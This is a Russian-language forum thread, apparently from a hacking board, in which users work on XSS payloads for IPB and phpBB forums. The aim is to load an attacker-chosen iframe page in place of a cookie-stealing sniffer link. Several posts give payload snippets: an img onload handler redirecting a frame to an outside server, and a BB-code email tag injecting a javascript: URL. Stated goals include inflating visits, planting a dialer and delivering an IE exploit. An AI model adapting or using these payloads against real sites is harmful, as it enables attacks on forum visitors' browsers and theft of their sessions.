![]() |
iframe вместо ссылки на снифер
Вот возникла идея, а можно ли, изменить XSS BB код того же IPB или PHPBB таким образом, чтобы не куки воровать, а вместо ссылки на снифер браузером открывшего страницу юзера обрабатывался iframe тег, ну и соответственно открывалась страничка в этом ifram'е. Советы и примеры принимаются в любых колличествах :))
|
Мде, это уже называется раскрутка, да конечно возможно))) Нужно посидеть подумать может чтонить придумаю!
|
Можно. А какие советы или примеры тебе нужны?
|
Да, было бы неплохо, хотя бы один примерчик :))
|
Цитата:
|
Столкнулся с той же проблемой.
Например срабатывает такое XSS: Код:
<image src="a.jpg" onload=alert();>Код:
<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">Подскажите, пожалуйста, как это еще можно осуществить. |
диалер чтоли вставить хочешь?))))
|
Ну от банальной накрутки посещений до эксплоита под Ie.
|
не совсем уверен про что ты говоришь, но поробуй прочитать http://antichat.ru/txt/hmail/ про mail.ru, там как раз фрейм
|
код не image а img вроде, насколько я знаю :D насчет данного способа - мне не нравиться :)
И вообще, если тебе надо сделать два фрейма, так и сделай их... в одном будет то что тебе надо в другом прежний контент страницы ;) |
Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....
|
Цитата:
|
Цитата:
Береш сплоит... Находишь строчки кода HTML и меняешь их... На нужные... Дай сплоит помогу )))) |
Вот это, если не ошибаюсь XSS для последней или предпоследней версии IPB.
Код:
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javaSCript:alert(/wj/))` |
Попробуй так... Хотя конечно может и не сработать ))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т УТ НУЖНЫЙ ТЕБЕ КОД))` |
сильно наврят-ли :))) вы че, сами то смотрите,че пишете?))))))
[e*mail]wj@wj.com[/e*mail] ` style=`background:url(javascript:document.write(Т У Т НУЖНЫЙ ТЕБЕ КОД))` ага... почему ` уже после ББ кода? Не тот код, если я не ошибаюсь! |
даа, че-то не работает. Блин, надо пытаться, я думаю многим будет полезен результат ;)
|
тэги типа
Код:
<iframe>Код:
javascript:location.href='http://server.ru'WizART, а что ты имел ввиду по поводу создания фрейма? Как его возможно сделать, когда теги фильтруются? |
А вы вообще уверены, что сплоит рабочий?
|
Цитата:
|
интересует аналогичный вопрос =)))
mixas чувстую мы на одну цель работаем... =))) |
так как умы форума додумались? интерестно услышать було б данную реализацию кода.
|
| Время: 13:56 |